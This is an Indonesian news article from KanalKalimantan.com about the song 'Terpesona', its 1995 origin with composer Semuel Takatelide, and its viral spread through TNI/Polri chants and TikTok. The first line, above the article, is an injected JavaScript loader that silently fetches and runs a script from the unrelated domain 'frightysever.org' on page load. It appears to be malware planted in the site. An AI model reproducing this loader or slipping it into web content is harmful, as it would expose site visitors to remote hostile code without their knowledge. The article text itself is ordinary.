(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Viral

Dari Yel-yel TNI jadi Viral, Ternyata Lagu Terpesona Berumur 26 Tahun, Begini Kata Sang Penciptanya


KANALKALIMANTAN.COM – Kekinian, siapa yang tidak mengetahui lagu Terpesona? Sejak viral dan kerap dinyanyikan satuan TNI dan Polri, Terpesona semakin akrab di telinga masyarakat Indonesia. Lagu yang dipopulerkan Masamper New Nazareth ini ternyata sudah berumur 26 tahun.

Adalah Semuel Takatelide sang pencipta lagu Terpesona yang tak pernah menyangka jika karyanya tersebut bakal populer di tengah Pandemi Covid-19 saat ini.

Lagu yang lirik dan aransemen sederhana ini, pun makin mempesona. Lantaran banyak kalangan mendendangkan lagu yang ternyata memiliki perjalanan panjang sebelum dikenal luas seperti saat ini.

Kepada BeritaManado.com -jaringan Suara.com, Semuel mengemukakan lagu tersebut diciptakannya pada tahun 1995. Meski begitu, butuh waktu tiga tahun agar Terpesona masuk dapur rekaman, tepatnya di tahun 1998 dan kali pertama direkam di studio Revan Record.

Sebenarnya Terpesona diciptakan untuk kepentingan festival atau lomba Masamper yang kala itu menjadi tren dan banyak digelar di beberapa tempat. Pun untuk lomba Masamper terdiri dari 5 part, salah satunya pujian yang harus dibawakan secara berbalas-balasan oleh dua tim atau lebih.

“Jadi lagu Terpesona saat itu saya ciptakan untuk kepentingan itu, terpesona tapi hanya dalam mimpi. Nah jadi harus dibalas, itu susahnya. Tapi balasannya juga saya ciptakan sebenarnya,” ujar Semuel pada Selasa (2/2/2021).

Untuk diketahui lagu ini berada di urutan ketiga, dalam album keempat New Nazareth yang bertajuk ‘Poco-poco Masamper.’

Di kemudian hari, lantaran teknologi semakin berkembang, Terpesona pun diproduksi kembali pada tahun 2000. Kali ini dalam format CD/DVD karena sebelumnya hanya berupa kaset tape atau kaset pita.

“Saat itu memang yang kaset CD baru masuk di Manado, makanya kita buat yang baru yang sudah audio visual. Sesuai judulnya, kita pakai model yang juara poco-poco nasional,” kata Semuel.

Waktu berlalu seperti biasa, New Nazareth pun terus berkarya dengan lagu-lagu lainnya seperti Bersyukurlah yang juga viral pada zamannya. Hingga pada tahun 2007, dia diminta untuk melatih para prajurit TNI/Polri di Manado menyanyikan lagu Terpesona dalam rangka mengisi acara di Korem 131/Santiago.

Sejak saat itu, bertahun kemudian Terpesona muncul sebagai salah satu lagu dalam yel-yel TNI-Polri. Berbagai versi video yel-yel tersebut mendapat sambutan hangat dari warganet yang turut menyukai lagu Masamper ini.

Semuel pun mengaku senang karena karyanya ternyata diminati hingga ke kemiliteran. Pun dia tak menyangka, pada 2021, Terpesona viral dan menjadi lagu yang disukai hampir semua kalangan terutama pengguna media sosial.

Di tengah viralnya Terpesona versi militer, pemilik akun @iam.moon:)/bulansutena kemudian menyanyikannya dengan versi pop yang akhirnya viral dan langsung diikuti oleh banyak TikTokers (pengguna TikTok).

Lagu Masamper ini kemudian digunakan oleh banyak jenis video atau konten bahkan oleh konten kreator dari mancanegara seperti @pjm20011 atau Kejimin asal Korea Selatan. Bahkan, konten kreator Fiki Naki hingga penyanyi Yura Yunita juga ikut menyanyikan lagu Terpesona.

Lagu Masamper ini juga telah debut disejumlah stasiun televisi dan telah memiliki banyak cover di berbagai channel YouTube. Tidak sampai di situ, Semuel selaku pencipta lagu juga mengungkapkan telah menerima banyak sekali tawaran kerja sama dari berbagai kalangan, mulai perusahaan rekaman, penyanyi, DJ dan lainnya.

“Saya sudah tandatangan kontrak dengan PT Harpa Swara Kusuma belum lama ini sebagai publisher, jadi yang menangani urusan publish lagu. Banyak yang telepon terkait lagu Terpesona, 50-an ada itu,” ungkap Semuel.

“Saya sangat tidak menyangka karena ini kan memang lagu masamper biasa. Bisa sampai sekarang ini tentu senang dan bersyukur. Kalau sudah jalan Tuhan, ya memang akan terjadi,” katanya. (suara.com)

Editor : Kk

 

 

 

 

 


Al Ghifari

Recent Posts

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

1 jam ago

Jalan Pangeran Suriansyah Banjarbaru Steril PKL dan Parkir Tepi Jalan

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas Pedagang Kaki Lima alias PKL di sepanjang jalan Pangeran Suriansyah, Kelurahan… Read More

3 jam ago

Wapres Serahkan Motor Perpustakaan Keliling ke Pemkab HSU

KANALKALIMANTAN.COM, JAKARTA - Wakil Presiden RI, KH Ma’ruf Amin secara simbolis menyerahkan bantuan Motor Perpustakaan… Read More

4 jam ago

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

16 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

16 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

17 jam ago

This website uses cookies.